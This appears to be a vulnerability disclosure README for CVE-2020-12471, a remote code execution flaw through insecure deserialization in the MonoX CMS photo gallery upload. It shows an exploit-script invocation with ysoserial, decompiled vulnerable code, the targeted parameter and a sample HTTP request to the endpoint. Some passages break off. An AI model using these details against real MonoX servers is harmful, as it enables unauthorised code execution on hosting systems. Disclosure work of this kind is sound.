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Photogallery - Remote Code Execution via Insecure Deserialization

VulDB-Like Summary

A vulnerability has been found in the MonoX CMS for .NET up to v5.1.40.5152. It has been rated as critical. Affected by this issue are the classes MonoX.MonoSoftware.MonoX.HTML5Upload and MonoX.MonoSoftware.MonoX.SilverLightUploadModule. The manipulation of the of the ctl00$ctl00$ctl01$ctl00$cp$cp$wpm$gwpsnPhotoGallery$snPhotoGallery$photoUpload$ctlUpload$handlerResponse parameter leads to Remote Code Execution vulnerability. Using CWE to declare the problem leads to CWE-502. Impacted is Integrity and Availability. An attacker might be able execute arbitrary code within the application context, and use them to achive remote code execution within the underlying hosting server.

The weakness was presented 04/19/2020 by Alessandro Magnosi (deadc0de) (GitHub Repository). The advisory is shared for download at This vulnerability is handled as CVE-2020-12471. The attack may be launched remotely. A single form of authentication is required for exploitation. Technical details are known and an exploit is publicly available.


An exploit script is provided in this repository, which may be used to easily verify and exploit the vulnerability.

The script should give the following output, proving the vulnerability.

$ python3 -t http://monox.local -u admin -p Passw0rd! -c calc -y path/to/ysoserial.exe
[*] Logging in
[*] Triggering RCE
[+] Success!

When the script finishes, a calculator should spawn in the target server.


This vulnerability was easily identified by code inspection. The affected function is the following:

//#Kw Decompiled function name
private void #Kw(object sender, EventArgs e)
        if (this.EnableFileGallery && ApplicationSettings.TrustLevel == AspNetHostingPermissionLevel.Unrestricted)
            string[] array = this.handlerResponse.Value.Split(string.Format("{0},", "(SEPARATOR)"));
            foreach (string text in array)
                string s = text.Replace("(SEPARATOR)", string.Empty);
                SnFileDTO snFileDTO = null;
                    snFileDTO = (SnFileDTO)BinarySerializer.Deserialize(Convert.FromBase64String(s));
                    snFileDTO = null;
                if (snFileDTO != null)
            this.handlerResponse.Value = string.Empty;
            this.UploadedFileDTOs = null;
        this.OnFilesUploaded(this.EntityId, this.EntityType);

This function got called after an image was uploaded in the gallery. Intercepting the traffic with Burp revealed the endpoint. The litmus test was finding a base64 encoded string followed by (SEPARATOR). An example request is following:

POST /MonoX/Pages/SocialNetworking/lng/en-US/PhotoGallery.aspx HTTP/1.1
Host: monox.local
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/71.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: {Stripped}
Content-Length: 5240


With these information, it was fairly easy to trigger an RCE via deserialization crafting a payload with


Currently, no fixes are available for this issue.
